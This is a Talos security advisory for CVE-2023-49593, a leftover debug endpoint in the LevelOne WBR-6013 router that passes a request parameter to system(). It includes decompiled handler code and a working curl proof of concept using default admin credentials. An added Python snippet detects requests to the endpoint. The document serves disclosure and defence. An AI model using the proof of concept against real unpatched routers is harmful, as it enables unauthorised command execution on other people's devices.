Talos Vulnerability Report

TALOS-2023-1873

LevelOne WBR-6013 boa formSysCmd leftover debug code vulnerability

July 8, 2024
CVE Number

CVE-2023-49593

SUMMARY

Leftover debug code exists in the boa formSysCmd functionality of LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623. A specially crafted network request can lead to arbitrary command execution.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623

PRODUCT URLS

WBR-6013 - https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-489 - Leftover Debug Code

DETAILS

The WBR-6013 is a SOHO wireless router produced by LevelOne.

The WBR-6013 router has a web server called boa. The firmware is built from a Realtek SDK that uses boa. One of the SDK's APIs is /boafrm/formSysCmd. This appears to be debugging functionality that allows execution of arbitrary commands on the Linux system running on the device. It appears that this functionality was not removed prior to release, as there is no documented feature for executing commands on the Linux system. The following is the formSysCmd function that handles the /boafrm/formSysCmd API:

void formSysCmd(void *wp)
{
    [...]

    uVar1 = get_request_param(wp,"submit-url","");
    /* sysCmd is taken verbatim from the request: no validation, no allowlist */
    syscmd_ptr = (char *)get_request_param(wp,"sysCmd","");
    if (*syscmd_ptr != '\0') {
        /* the attacker-controlled string is formatted into a shell command line... */
        snprintf(command_buff,100,"%s 2>&1 > %s",syscmd_ptr,"/tmp/syscmd.log");
        /* ...and handed to the shell unchanged */
        system(command_buff);
    }
    [...]
}

An attacker able to reach this API would be able to execute arbitrary commands on the device.

Exploit Proof of Concept

Because of a CSRF protection mechanism, before a specific API of the web server can be used it is necessary to first load the HTML page that would call that API:

curl --user admin:admin http://<DEVICE_IP>/syscmd.htm &>/dev/null

After this request it is possible to use the /boafrm/formSysCmd API:

curl -d "sysCmd=reboot" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formSysCmd

After the request, the device will reboot. The PoC uses the default admin credentials.
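As an added illustration that is not part of the Talos advisory, the following Python snippet shows how a network-side monitor could flag the two-step flow described above (the GET to /syscmd.htm followed by a POST to /boafrm/formSysCmd) and surface the sysCmd value that the handler passes to system(). The minimal HTTP parser and the sample requests are constructed for this example; only the two paths and the parameter name come from the advisory.

```python
"""Flag requests to the WBR-6013 leftover debug endpoint (added example; the
minimal HTTP parser and sample requests are constructed, not from the advisory)."""
from urllib.parse import parse_qs, urlsplit

DEBUG_ENDPOINT = "/boafrm/formSysCmd"  # handler that passes sysCmd to system()
PRELOAD_PAGE = "/syscmd.htm"           # page that must be fetched first (CSRF gate)

def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": urlsplit(target).path,
            "headers": headers, "body": body}

def inspect(raw):
    """Return an alert dict if the request touches the debug flow, else None."""
    req = parse_request(raw)
    if req["path"] == PRELOAD_PAGE:
        # Fetching syscmd.htm is the prerequisite step; low severity on its own
        return {"method": req["method"], "sysCmd": "", "severity": "low"}
    if req["path"] != DEBUG_ENDPOINT:
        return None
    ctype = req["headers"].get("content-type", "")
    params = parse_qs(req["body"]) if "x-www-form-urlencoded" in ctype else {}
    cmd = params.get("sysCmd", [""])[0]  # the string that reaches system()
    return {"method": req["method"], "sysCmd": cmd,
            "severity": "high" if cmd else "medium"}

def scan(requests):
    """Run inspect() over raw requests and keep only the alerts."""
    return [a for a in (inspect(r) for r in requests) if a]

# Constructed sample traffic, not captured from a real device
SAMPLES = [
    "GET /syscmd.htm HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
    ("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: 192.0.2.1\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n"
     "Content-Length: 13\r\n\r\nsysCmd=reboot"),
    "GET /status.htm HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",  # constructed benign path
]

if __name__ == "__main__":
    for alert in scan(SAMPLES):
        print(alert)
```

Any hit on the debug endpoint from a device in production is worth an alert, since the vendor has not removed the handler; the severity field only distinguishes the reconnaissance step from an actual command submission.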

VENDOR RESPONSE

LevelOne has declined to patch the issues in their software.

TIMELINE

2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-07-08 - Public Release

Credit

Discovered by Francesco Benvenuto of Cisco Talos.